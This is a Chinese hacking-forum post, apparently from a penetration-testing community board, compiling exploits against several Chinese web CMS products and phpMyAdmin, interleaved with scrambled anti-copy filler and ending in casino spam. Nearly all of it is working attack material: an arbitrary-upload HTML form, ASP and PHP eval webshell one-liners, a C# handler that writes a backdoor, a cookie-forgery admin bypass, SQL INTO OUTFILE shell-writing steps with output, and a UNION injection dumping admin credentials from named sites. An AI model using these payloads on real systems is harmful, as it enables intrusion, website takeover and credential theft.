inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
: b) V( C+ M% g; Q2 C* Y$ U
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" X# ]; x' R. U4 @( W& K& j# f
$ Q+ c; q5 x5 T
YxShop易想购物商城4.7.1版本任意文件上传漏洞
4 Q6 P6 m6 G( ~5 y
8 S r5 K) A$ a
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
* V4 q! Z3 g: |3 o% \$ a
跳转到网站根目录上传任意文件。
0 l+ C; ?; Z# d* @, _) C
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
, v) y. L6 v( d( R" c1 L( M
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
. R/ I' q7 Y3 B6 p6 T2 k( ~: g
Upload a new file:<br>
# V# j1 B; y; z; f K0 f, C
<input type="file" name="NewFile" size="50"><br>
* D) [* l5 U6 H" x& d$ w
<input id="btnUpload" type="submit" value="Upload">
8 n& b; |/ y6 W+ O Z' P3 ?- q( n
</form>
8 h' Z/ l# r" l# B& \, V
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, }9 ^: ^+ V6 q( {- Y* {2 ]
. C2 ^' y$ y( `: Y9 ]/ D. a: d
SDcms 后台拿webshell
, j q& |$ F& Y; F
+ K: P6 V+ V) N' p
第一种方法:
( V9 R N4 T& T T: {, M5 h( E4 z
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
) i( \% K( R9 h/ g! ]& f
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
/ @/ ]7 G1 R; x' y. [* M' Q
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
4 F! K8 ~ K) s6 I# \) }) i
第二种方法:
: G( n- P+ f. h7 E
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
, M! L$ h; }% N2 d/ E) [3 y7 B
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
( P; M0 o8 h8 t) y
第三种方法:
+ j8 k% Z8 _" N& s& }
进入后台-->界面管理-->模板文件管理-->创建文件
2 y- t1 o0 J6 g. N6 [" |( {% p. \
文件名写入getshell.ashx
6 `4 i. X5 @2 Y8 z* M1 n1 ?9 Q
内容写入下面内容:
( }8 O2 ]& j2 X6 k
/====================复制下面的=========================/
: `$ F$ m! L" T$ n
<%@ WebHandler Language="C#" Class="Handler" %>
' }* z+ E" Q* g T- W" k; ^- o
using System;
$ h. j9 e/ e0 K) ^; Z! |
using System.Web;
0 L; G, F7 \3 D: ?
using System.IO;
# A8 z% A" }# M9 T* N
public class Handler : IHttpHandler {
( T3 w1 _# D3 z; G
public void ProcessRequest (HttpContext context) {
* J4 z. I* X c; h3 b9 q: H+ b- y! Y
context.Response.ContentType = "text/plain";
1 h' L& D9 a! m& A# U. j
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
/ r; E; a+ D7 q, A) q" d% O4 _
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
. T4 b: g+ F, }' M2 ?
file1.Flush();
W0 I! N3 f5 }/ g; V
file1.Close();
# \1 o, g5 v, U
}
4 J( ~! h) o0 _ Y$ s) n- N
public bool IsReusable {
t, ^/ `: ^4 f" Y& R. S/ ^
get {
" R7 q, Q2 P5 t: ^
return false;
% m4 s9 Q* l0 ]7 x5 c/ Y
}
: l5 H4 S+ [* Q4 K, Y7 F& B5 h
}
* S b7 a! ` D/ p: E" i+ ?
}
2 ]# o* j5 s4 [4 x. p/ O7 G% S
/=============================================/
0 v* U; X* c- E2 Z, j
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
0 g% E& Y4 u, i2 [
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
3 C! R9 m4 s1 a! |! p' _8 _
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 ?4 S( e; i# |- @* N
; G$ @3 G% i; w6 T% M# k2 Q
ESCMS网站管理系统0day
5 J6 S! I! \, Z* x8 J! K6 Y
3 E ^) e# @5 N
后台登陆验证是通过admin/check.asp实现的
4 I* }" V6 L `$ x8 X' a
* m( J; L5 b* o+ @0 I5 y
首先我们打开
http://target.com/admin/es_index.html
6 {7 V4 O" |* x6 S( ?- e1 h4 v& K6 Z8 M
然后在COOKIE结尾加上
?* e/ B2 [1 v5 J
; ESCMS$_SP2=ES_admin=st0p;
0 g# D! B' z# m. w
修改,然后刷新
1 U! v. _* c/ |0 k
进后台了嘎..
# ^4 F, `9 x7 ~1 B
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
8 D7 L' t" ^: {
( C& x: J# f7 U4 N
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
u) c( S* I5 R: L' F9 O7 i2 L
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
9 i( y& X& g+ N. l: D. l, o
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
+ p) k/ |5 [0 r e
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
' c" \% ]2 R( P& `( p. k
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 R: v* @# t1 ^6 v7 \6 h
: k, L X0 T7 ]7 H" e3 W
宁志网站管理系统后台无验证漏洞及修复
9 Q+ V4 V3 A5 b/ g8 k0 {" z. C
3 b- o/ ?; v& f$ Q G1 Z
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
, P! ?8 e5 N# s3 Q6 J; S/ N
官方网站:
www.ningzhi.net
) C8 c6 Y2 ?% Y. l
学校网站管理系统 V.2011版本
I' }# _; N V$ f
http://down.chinaz.com/soft/29943.htm
0 f; y* _' z u3 Z+ ?% P
其它版本(如:政府版等),自行下载.
# J3 v. z& D9 w7 M) ^3 |; W& X
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
. x4 _ ]: D% v
login.asp代码如下:
. L& ?& j1 `. C* P. I6 l
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
, m+ [1 I' e0 x6 x0 h
manage.asp代码我就不帖出来了.反正也没验证.
, b5 E, v" l+ s1 ^" v
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
% @7 g4 p d3 E ?8 G1 U$ l. b; k2 Q
漏洞利用:
) L" i; ^, o K1 h. s
直接访问
http://www.0855.tv/admin/manage.asp
/ N1 X" B6 x- @. Y( M6 k- g
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
7 a, F8 ?- c5 P- z9 W
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 U. A- |3 O; d- K9 Y
- ^/ V, E" |- m7 J' ~2 j
phpmyadmin拿shell的四种方法总结及修复
: C& ?" J5 D/ t; a8 U2 Y2 b
" l& C) X4 S+ Z9 e" f, c" i
方法一:
" p8 b/ W% v1 _! H$ u
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
" M1 d0 l! _& ]4 [( |0 Q6 t
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
+ ~2 R! n z0 Z! [) H
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
6 D( ^4 I& {# L; P7 A4 F
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
7 X3 [8 N: I% m, q# k
一句话连接密码:7on
d2 c, s( R4 j( z/ L
方法二:
/ H" C7 K4 M Y! `
读取文件内容: select load_file('E:/xamp/www/s.php');
4 H {- T8 f9 R' P- t1 l0 ~
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
, v0 r! H. R8 K9 ?
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
: L; e( u3 }- ~3 e
方法三:
1 _+ o6 T% N2 ?% w( t
JhackJ版本 PHPmyadmin拿shell
% B7 E' k! B+ t) B; g9 b" b4 ?
Create TABLE study (cmd text NOT NULL);
* V+ S2 Q0 s! k' K$ Z* ~
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
- Q' \; `& X0 L2 c8 }( ]$ T- l$ {
select cmd from study into outfile 'E:/wamp/www/7.php';
3 l! h0 j2 O3 I$ r
Drop TABLE IF EXISTS study;
! f6 _, h" d3 g7 Y' m3 {
<?php eval($_POST[cmd])?>
8 s" D% X' u# N: P2 n, v5 x
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
2 O' r4 I& F% i
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
1 S6 U( L1 C0 {$ v. r7 u! I
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
; ~' i9 A! x$ J) J# B( P" Z
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
# P, @% o4 |4 Z" C; t1 V
方法四:
/ J# D1 G/ W; P% ^- I: Y* g8 }
select load_file('E:/xamp/www/study.php');
) r X* l: @ q. \% i
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
1 r2 ~, k4 c' s4 u! n$ @& m4 K* y
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
+ K/ k0 `1 c1 F
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
# I2 u6 O$ @5 w, m4 i( ^
7 O5 D' c* ^( j$ z6 x3 o D( {. x, u
NO.001中学网站管理系统 Build 110628 注入漏洞
* y' W0 I- }# f' J
- b6 ^" T! J4 M+ [, Y8 d
NO.001中学网站管理系统功能模块:
* t" x" c* c: n1 L, ]" j5 Z* w
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
0 E% u0 x' i; u! t1 C% q i
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
7 l& S% x3 X9 i1 I! Z3 m+ `8 ~
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
8 ^! m, q1 m& ]" \/ I, z, ^
4.视频图片管理:一级分类,动态添加视频或者图片等信息
, r( Z; Q7 k8 _* I* o, f
5.留言管理:对留言,修改,删除、回复等管理
+ K1 A# m3 L7 t; b( X7 p
6.校友频道:包括校友资料excel导出、管理等功能
8 J0 Z2 o# Z+ D7 _7 k8 m4 S# c
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
! M8 X+ F7 _ K4 c M! P# l9 {* O
默认后台:admin/login.asp
( o& K0 {. |9 j
官方演示:
http://demo.001cms.net
* Q5 o2 A) ?& _, q2 r
源码下载地址:
http://down.chinaz.com/soft/30187.htm
8 ]: n0 X# @5 {4 s* U
EXP:
' y- t# x/ R0 f+ C+ o
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
4 Z7 }+ S; b+ L* W H& W
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! H. P7 I1 a- Q
getshell:后台有备份,你懂的
2 G' V7 j( k w8 H9 Z* i; @$ }
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
3 r8 j/ J7 G) B
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2